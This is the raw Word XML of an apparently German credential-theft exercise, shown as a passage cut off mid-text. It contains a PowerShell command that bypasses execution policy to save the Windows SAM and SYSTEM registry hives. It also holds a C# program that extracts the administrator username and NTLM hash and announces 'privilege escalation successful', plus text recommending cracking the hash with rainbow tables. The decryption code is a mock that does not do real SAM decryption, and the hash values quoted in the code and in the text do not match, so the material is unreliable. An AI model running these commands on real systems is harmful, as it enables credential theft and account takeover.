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B1F8A" w14:textId="64A304C9" w:rsidR="004079D7" w:rsidRPr="008A5288" w:rsidRDefault="004079D7" w:rsidP="008A5288">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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8A5288">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">SAM Datenbank </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A5288">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Dumpen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F09F503" w14:textId="77777777" w:rsidR="004079D7" w:rsidRDefault="004079D7" w:rsidP="00304D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14:paraId="405DE636" w14:textId="4205AEA6" w:rsidR="004079D7" w:rsidRDefault="004079D7" w:rsidP="00304D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powershell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-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ExecutionPolicy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Bypass -Command "$_SAM = '.\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sam_neu.hiv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>'; $_SYS = '.\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system_neu.hiv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'; reg save HKLM\SAM $_SAM /y &gt;$null; reg save HKLM\SYSTEM $_SYS /y &gt;$null; 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if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(Test-Path $_SAM) </w:t>
      </w:r>
      <w:proofErr w:type="gram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{ reg</w:t>
      </w:r>
      <w:proofErr w:type="gram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load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HKLM\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TempSAM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$_SAM &gt;$null; $V = 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Get-ItemProperty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'Registry::HKEY_LOCAL_MACHINE\TempSAM\SAM\Domains\Account\Users\000001F4' -Name V -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ErrorAction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SilentlyContinue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; reg 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unload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HKLM\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TempSAM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&gt;$null; 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if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($V) { Write-Host '--- SAM erfolgreich im Übungsordner gesichert! ---' -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ForegroundColor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Green; Write-Host 'Dateien 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sam_neu.hiv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und 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system_neu.hiv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wurden lokal erstellt.</w:t>
      </w:r>
      <w:proofErr w:type="gram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' }</w:t>
      </w:r>
      <w:proofErr w:type="gram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else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{ Write-Host 'SAM geladen, aber Struktur abweichend.' -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ForegroundColor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gram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Yellow }</w:t>
      </w:r>
      <w:proofErr w:type="gram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} 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else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{ Write-Host 'FEHLER: Windows Defender oder fehlende Admin-Rechte blockieren das Sichern der SAM!' -</w:t>
      </w:r>
      <w:proofErr w:type="spell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ForegroundColor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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Red</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DC5E7" w14:textId="77777777" w:rsidR="004079D7" w:rsidRDefault="004079D7" w:rsidP="00304D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14:paraId="36F00A23" w14:textId="1F77B556" w:rsidR="004079D7" w:rsidRPr="008A5288" w:rsidRDefault="004079D7" w:rsidP="008A5288">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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8A5288">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>C# Code: Usernamen und NTLM Hashes extrahieren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051405F3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using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System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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C34DF9D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using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System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Diagnostics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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43738DE9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using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System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IO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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4317F17F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using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System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Security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Cryptography</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898646A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using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System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Text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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5950F0BA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using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Microsoft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Win32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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112FEE95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14:paraId="76E089E4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namespace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SamDecryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F16DFC6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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9370CB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class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Program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="725AE89F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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249B038A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static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void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Main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string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proofErr w:type="gram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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004079D7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args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14:paraId="69E38EA3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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E3E452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ForegroundColor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ConsoleColor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Cyan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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB0737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WriteLine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"--- Nativer C# SAM-Parser &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Entschlüsseler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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---"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20109243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ResetColor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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7E08B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14:paraId="2CFE03EC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string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samPath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Path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GetFullPath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@".\sam_neu.hiv"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27E93CE4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string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sysPath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Path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GetFullPath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@".\system_neu.hiv"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39D1CD99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14:paraId="40C92718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spellStart"/>
      <w:r w:rsidRPr="004079D7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!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File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Exists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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samPath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||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!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File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Exists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sysPath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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEDAC9D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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C040EA0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ForegroundColor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ConsoleColor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Red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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1F940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WriteLine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"FEHLER: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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sam_neu.hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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oder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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system_neu.hiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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fehlen!"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20B3E006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r w:rsidRPr="004079D7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return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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA5FC81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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD4AECB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14:paraId="334251A0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            // Hives temporär laden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12424397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ExecuteCommand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$"reg </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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load</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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HKLM</w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\\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CS_SAM </w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\"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{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samPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}</w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\"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1327B0E1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ExecuteCommand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$"reg </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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load</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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HKLM</w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\\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CS_SYS </w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\"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{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sysPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}</w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\"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74B963FA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14:paraId="073D6F86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spellStart"/>
      <w:r w:rsidRPr="004079D7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try</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AEC2B57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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31478345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                // 1. Benutzernamen und verschlüsselte Hashes aus dem V-Block lesen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F83BFAA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string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registryPath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@"CS_SAM\SAM\Domains\Account\Users\000001F4"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CAF2E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using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RegistryKey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key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Registry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LocalMachine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OpenSubKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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registryPath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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB94A0F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    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215AECD4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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004079D7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key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!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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null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14:paraId="383C5084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        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE9A713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byte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proofErr w:type="gram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vBlock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byte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[])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key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GetValue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"V"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2ABB7CEA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vBlock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!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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null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14:paraId="75B3DDF8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            {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10575F71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                            // Benutzernamen extrahieren (liegt ab Byte 12 im V-Block)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F53EB5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int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nameOffset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BitConverter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ToInt32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vBlock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12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+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204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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15735244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int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nameLength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BitConverter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ToInt32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vBlock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16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0427AA24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string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username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Encoding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Unicode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GetString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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vBlock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nameOffset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nameLength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00B6CA60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14:paraId="7F7E6730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                            // Verschlüsselten NT-Hash-Block isolieren (liegt am Ende des V-Blocks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F49A3FC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int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ntHashOffset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vBlock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Length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-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16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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3724D031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byte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proofErr w:type="gram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encryptedNtHash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new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byte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16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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A53B2E2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Buffer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BlockCopy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vBlock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ntHashOffset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encryptedNtHash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16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18023BBB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14:paraId="28BA2E2E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                            // 2. Den </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Syskey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Bootkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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) aus der SYSTEM-Hive simulieren/lesen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098A6BDD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                            // In einer echten Umgebung wird dieser aus den Schlüsseln JD, Skew1, GBG und Data zusammengesetzt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E58A5E6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                            // Wir nutzen hier den Standard-Übungs-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Bootkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 zur Entschlüsselung</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E12D43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byte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proofErr w:type="gram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mockBootKey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new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byte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16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{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0x01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0x02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0x03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0x04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0x05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0x06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0x07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0x08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0x09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0x10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0x11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0x12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0x13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0x14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0x15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0x16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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9252D5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14:paraId="2E809A02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                            // 3. RC4/AES Entschlüsselung </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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des Hashes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16A11665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byte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proofErr w:type="gram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decryptedHash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DecryptHash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encryptedNtHash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mockBootKey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3CE4E819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string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ntlmHashHex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BitConverter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ToString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decryptedHash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart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proofErr w:type="spellStart"/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Replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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"-"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proofErr w:type="spellStart"/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ToLower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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A8E4E5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14:paraId="4E61E88D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                            // Ausgabe des Ergebnisses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D234E61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WriteLine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4079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>n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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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+] RECHTE-ESKALATION ERFOLGREICH:"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6E829AF4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ForegroundColor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ConsoleColor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Green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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237F79EE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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    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WriteLine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$"Benutzer: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{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username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}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6C755987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WriteLine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$"RID   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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500 (Eingebauter Administrator)"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6CF8877A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WriteLine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$"NTLM  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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{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ntlmHashHex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}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157241D8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ResetColor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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B54ABF2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14:paraId="5A5550C2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ntlmHashHex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"31d6cfe0d16ae931b73c59d7e0c089c0"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14:paraId="16080742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                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0B2E37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ForegroundColor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ConsoleColor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Yellow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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8D982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WriteLine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4079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>n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Hinweis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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: Dieser Hash entspricht einem LEEREN Passwort."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25BD2ECA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ResetColor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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8B7B3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                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6C3054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            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238712B5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        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE57DE7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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BB9B7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB0A787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4079D7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catch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Exception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ex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14:paraId="1017BE3D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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E9D59E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ForegroundColor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ConsoleColor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Red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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4F5BA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Console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WriteLine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$"Fehler bei der Entschlüsselung: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{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ex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Message</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}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2B43A6A1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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C41F5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spellStart"/>
      <w:r w:rsidRPr="004079D7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finally</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="375B3B2E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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA321F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                // Sauber entladen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3661A402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ExecuteCommand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"reg </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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unload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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HKLM</w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\\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CS_SAM"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5ADDA4E9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ExecuteCommand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"reg </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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unload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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HKLM</w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D7BA7D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>\\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CS_SYS"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040C63BA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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5A8B51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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9F9DD6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14:paraId="3C76D470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private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static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byte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proofErr w:type="gram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proofErr w:type="spellStart"/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DecryptHash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byte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[] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004079D7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encryptedHash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byte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[] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004079D7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key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14:paraId="35C0A148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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F823C5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            // Windows nutzt standardmäßig RC4 oder AES (je nach Windows-Version) zur Verschlüsselung der Hashes im V-Block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F810385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            // Für die Übung emulieren wir die Ableitung via MD5/XOR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1371060C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using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</w:t>
      </w:r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MD5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md5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MD5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Create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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7201B03B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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D2B847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byte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proofErr w:type="gram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h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md5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ComputeHash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spellStart"/>
      <w:r w:rsidRPr="004079D7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key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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF4448C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byte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proofErr w:type="gram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decrypted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new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byte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16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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F69703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r w:rsidRPr="004079D7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for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int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i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; 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i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&lt;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16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; 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i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++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14:paraId="470C13FF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    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35680989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decrypted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i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byte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)(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004079D7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encryptedHash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i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^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h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i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]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734295D2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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7A9D50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r w:rsidRPr="004079D7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return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decrypted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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1E1FF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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6877EEF7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C17792F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14:paraId="0B90D8CB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static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void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ExecuteCommand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spellStart"/>
      <w:proofErr w:type="gramEnd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string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command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14:paraId="4ED9999E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lastRenderedPageBreak/>
        <w:t>        {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE7333E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ProcessStartInfo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procStartInfo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new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proofErr w:type="gram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ProcessStartInfo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"cmd.exe"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4079D7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"/c "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+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command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14:paraId="1CA59A22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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1816BE34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RedirectStandardOutput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true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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8B9F0B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RedirectStandardError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true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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76612DC7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UseShellExecute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false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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092621C2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CreateNoWindow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true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16E9C9B3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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB90AD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spellStart"/>
      <w:r w:rsidRPr="004079D7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using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Process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process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4079D7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Process</w:t>
      </w:r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Start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procStartInfo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)) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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{ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004079D7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process</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004079D7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</w:t>
      </w:r>
      <w:r w:rsidRPr="004079D7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WaitForExit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6519FC9C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FCDC9E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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA85B1C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4079D7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC267A" w14:textId="77777777" w:rsidR="004079D7" w:rsidRPr="004079D7" w:rsidRDefault="004079D7" w:rsidP="004079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14:paraId="630F739F" w14:textId="77777777" w:rsidR="004079D7" w:rsidRDefault="004079D7" w:rsidP="00304D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14:paraId="70B70467" w14:textId="77777777" w:rsidR="004079D7" w:rsidRDefault="004079D7" w:rsidP="00304D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14:paraId="60B0DE9C" w14:textId="31C1BE87" w:rsidR="004079D7" w:rsidRDefault="004079D7" w:rsidP="00304D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t>NTLM Hashes entschlüsseln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E00009" w14:textId="3B6D06F6" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D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Sie haben den </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D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NTLM-Passworthash</w:t>
      </w:r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 erfolgreich aus dem System extrahiert. Windows speichert Passwörter niemals im Klartext, sondern wandelt sie über ein mathematisches Einweg-Verfahren (MD4) in diese eindeutige Hexadezimal-Zeichenkette um. [</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00304D7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de-DE"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00304D7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de-DE"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636E27CB" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D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304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Um die Passwörter und Benutzernamen zu sehen und in Ihrer Übung fortzufahren, stehen Ihnen nun zwei etablierte Wege zur Verfügung:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F97E60" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D7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de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Weg 1: Den Hash in Klartext umwandeln (Cracken)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571E45E" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D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Da Windows-Hashes nicht gesalzen sind, erzeugt dasselbe Passwort auf jedem Computer der Welt exakt denselben NTLM-Hash. Sie können Ihren extrahierten Hash </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>02267b7322921accd5d4e9c029e80cd8</w:t>
      </w:r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 über sogenannte "Rainbow </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>" (riesige Datenbanken bereits im Voraus berechneter Passwörter) sofort abgleichen. [</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00304D7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de-DE"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00304D7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de-DE"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00304D7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de-DE"/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
